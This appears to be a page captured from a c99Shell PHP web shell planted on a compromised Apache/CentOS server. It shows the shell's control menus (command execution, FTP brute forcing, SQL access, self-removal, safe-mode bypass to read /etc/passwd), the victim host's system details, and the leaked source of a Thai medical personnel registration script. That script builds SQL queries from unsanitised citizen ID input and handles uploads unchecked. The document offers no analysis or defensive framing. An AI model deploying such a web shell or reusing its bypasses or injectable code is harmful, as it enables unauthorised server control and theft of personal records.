!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/thaimed/   drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertThperson.php (7.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"; $sql = "Select * From personal_den_tb Where Citizen_id='$Citizen_id'"; $result = mysql_query($sql) or die("Error $result".mysql_error()); $sum = mysql_num_rows($result); if ($sum>0) { $msg .="
  • รหัส $Citizen_id ซ้ำ"; $button =""; $Flag = false; } ///////////// นำค่า id มาเพิ่มให้กับค่ารหัสสมาชิกครั้งละ1 //////// //$sql3 = "Select * From personal_den_tb order by Person_code desc"; //$result3 = mysql_query($sql3) or die("Error $result3".mysql_error()); //$rs = mysql_fetch_row($result3); //$personal_den_tb = $rs[0]+1 ; // นำค่า id มาเพิ่มให้กับค่ารหัสสมาชิกครั้งละ1 //if($personal_den_tb>=100) { //$HN_code = "0$personal_den_tb" ; //} //else { //if($personal_den_tb >=10) { //$HN_in = "000$personal_den_tb" ; //} //else { //$HN_in = "0000$personal_den_tb" ; //} //} //$HN_code = "$yourcode$HN_in" ; // รหัสสมาชิกเช่น ip0001 //////////////////// check Status Personal Register //$sql2 ="Select * From accounttb Where Teacher_id = '$Teacher_id' "; //$result1 = mysql_query($sql2) or die("Error $result1 $sql2".mysql_error()); //$row = mysql_num_rows($result1); //if ($row < 0) //{ //$msg .="
  • Teacher id Incorrect"; //$button =""; //$Flag = false; //} ////////////////////////// check First name if ($prefixId=="") { $msg .="
  • กรุณาระบุ คำนำหน้า"; $button =""; $Flag = false; } ///////////////////// check name if ($Name =="") { $msg .="
  • กรุณาระบุ ชื่อ"; $button =""; $Flag = false; } /////////////////// Check Lastname if ($Lastname =="") { $msg .="
  • กรุณาระบุ นามสกุล"; $button =""; $Flag = false; } //////////////////////// if ( ! CheckLenght( $Citizen_id,13 ) ) { $msg .= "
  • รหัสบัตรประชาชนต้องมีตั้งแต่ 13 หลัก"; $button = ""; $Flag = false; } ///////////////////////// Check Status to Insert Data ///////////////////////////// if( $Flag) { $Path = "../images"; if ( isset($Img1) ) if (copy($Img1,"$Path/$Img1_name")) { unlink ($Img1); $Img1 = "$Path/$Img1_name"; } else echo"Can't Copy"; InsertPersonMed($HN_code,$Teacher_code,$massegeId,$prefixId,$Name,$Lastname,dmyE2ymdT($date),$DateBirth,$Sex,$Hostpital,$Nationality,$Nation,$Religion,$Citizen_id,$Address,$Age,$amphurId,$districtId,$provinceId,$Zipcode,$Phone,$Mobile,$Work,$Education,$Email_name,$Email_1,$State_bank,$Status2, $Status3,$Img1,$Degree_code,$Club_nid,$Group_1,$Group_2,$Group_3,$Group_4,$MedCode); $msg.="
  • คุณ $Name $Lastname"; $msg.="
  • ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว"; $button = ""; echo ""; ?>

    ::แบบฟอร์มกรอกข้อมูลประวัติ::
    ระบบแจ้งการทำงาน
            


  • :: Command execute ::

    Enter:
     
    Select:
     

    :: Shadow's tricks :D ::

    Useful Commands
     
    Warning. Kernel may be alerted using higher levels
    Kernel Info:

    :: Preddy's tricks :D ::

    Php Safe-Mode Bypass (Read Files)

    File:

    eg: /etc/passwd

    Php Safe-Mode Bypass (List Directories):

    Dir:

    eg: /etc/

    :: Search ::
      - regexp 

    :: Upload ::
     
    [ Read-Only ]

    :: Make Dir ::
     
    [ Read-Only ]
    :: Make File ::
     
    [ Read-Only ]

    :: Go Dir ::
     
    :: Go File ::
     

    --[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--